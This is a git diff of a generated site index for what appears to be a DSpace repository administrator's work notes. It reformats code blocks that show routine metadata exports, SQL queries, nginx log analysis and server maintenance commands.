                                                                                                                                                                                                                                                                                                                                                                                                                                Read more → diff --git a/docs/index.xml b/docs/index.xml index 880e40a9a..a1ae614b7 100644 --- a/docs/index.xml +++ b/docs/index.xml @@ -17,11 +17,11 @@ <ul> <li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> @@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv & <li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> <li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p -Purging 1989 hits from The Knowledge AI in statistics -Purging 1235 hits from MaCoCu in statistics -Purging 455 hits from WhatsApp in statistics -<span style="color:#960050;background-color:#1e0010"> -</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> +</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> @@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics <li>I experimented with manually sharding the Solr statistics on DSpace Test</li> <li>First I exported all the 2019 stats from CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid -$ zstd statistics-2019.json -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> @@ -101,15 +101,15 @@ $ zstd statistics-2019.json <ul> <li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; -$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili -ations-matching.csv -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l -1879 -$ wc -l /tmp/2021-10-01-affiliations.txt -7100 /tmp/2021-10-01-affiliations.txt -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> <li>So we have 1879/7100 (26.46%) matching already</li> </ul> @@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Update Docker images on AReS server (linode20) and reboot the server:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> <li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> </ul> @@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; -COPY 20994 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> @@ -271,17 +271,17 @@ COPY 20994 <li>I had a call with CodeObia to discuss the work on OpenRXV</li> <li>Check the results of the AReS harvesting from last night:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> -{ - &#34;count&#34; : 100875, - &#34;_shards&#34; : { - &#34;total&#34; : 1, - &#34;successful&#34; : 1, - &#34;skipped&#34; : 0, - &#34;failed&#34; : 0 - } -} -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> @@ -599,17 +599,17 @@ COPY 20994 </ul> </li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 4671942 -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 1277694 </code></pre><ul> <li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> <li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; 1183456 -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot; +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; 106781 </code></pre> @@ -620,7 +620,7 @@ COPY 20994 Tue, 01 Oct 2019 13:20:51 +0300 https://alanorth.github.io/cgspace-notes/2019-10/ - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc. + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. @@ -634,7 +634,7 @@ COPY 20994 <li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> <li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -645,7 +645,7 @@ COPY 20994 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -761,16 +761,16 @@ DELETE 1 </ul> </li> </ul> -<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5 +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 4432 200 </code></pre><ul> <li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> <li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d </code></pre> @@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li> <li>The top IPs before, during, and after this latest alert tonight were:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 245 207.46.13.5 332 54.70.40.11 385 5.143.231.38 @@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> <li>There were just over 3 million accesses in the nginx logs last month:</li> </ul> -<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot; +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; 3018243 real 0m19.873s @@ -844,7 +844,7 @@ sys 0m1.979s <li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> <li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 92 40.77.167.4 99 210.7.29.100 120 38.126.157.45 @@ -979,7 +979,7 @@ sys 0m1.979s <li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> <li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n </code></pre><ul> <li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> <li>Time to index ~70,000 items on CGSpace:</li> @@ -1073,11 +1073,11 @@ sys 2m7.289s <li>I notice this error quite a few times in dspace.log:</li> </ul> <pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32. +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. </code></pre><ul> <li>And there are many of these errors every day for the past month:</li> </ul> -<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.* +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* dspace.log.2017-11-21:4 dspace.log.2017-11-22:1 dspace.log.2017-11-23:4 @@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34 <ul> <li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> </ul> -<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log 0 </code></pre><ul> <li>Generate list of authors on CGSpace for Peter to go through and correct:</li> </ul> -<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; COPY 54701 </code></pre> @@ -1289,7 +1289,7 @@ COPY 54701 <li>Remove redundant/duplicate text in the DSpace submission license</li> <li>Testing the CMYK patch on a collection with 650 items:</li> </ul> -<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt +<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt </code></pre> @@ -1330,7 +1330,7 @@ COPY 54701 <ul> <li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li> </ul> -<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278'; +<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;; id | collection_id | item_id -------+---------------+--------- 92551 | 313 | 80278 @@ -1370,11 +1370,11 @@ DELETE 1 <li>CGSpace was down for five hours in the morning while I was sleeping</li> <li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li> </ul> -<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) +<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) </code></pre><ul> <li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li> <li>I&rsquo;ve raised a ticket with Atmire to ask</li> @@ -1429,7 +1429,7 @@ DELETE 1 <li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li> <li>It looks like we might be able to use OUs now, instead of DCs:</li> </ul> -<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot; +<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; </code></pre> @@ -1465,9 +1465,9 @@ $ git rebase -i dspace-5.5 <li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li> <li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li> </ul> -<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; UPDATE 95 -dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; text_value ------------ (0 rows) @@ -1505,7 +1505,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>I have blocked access to the API now</li> <li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li> </ul> -<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l +<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l 3168 </code></pre> @@ -1603,7 +1603,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>Looks like DSpace exhausted its PostgreSQL connection pool</li> <li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li> </ul> -<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace +<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace 78 </code></pre> diff --git a/docs/page/2/index.html b/docs/page/2/index.html index 4a26a119b..b25630012 100644 --- 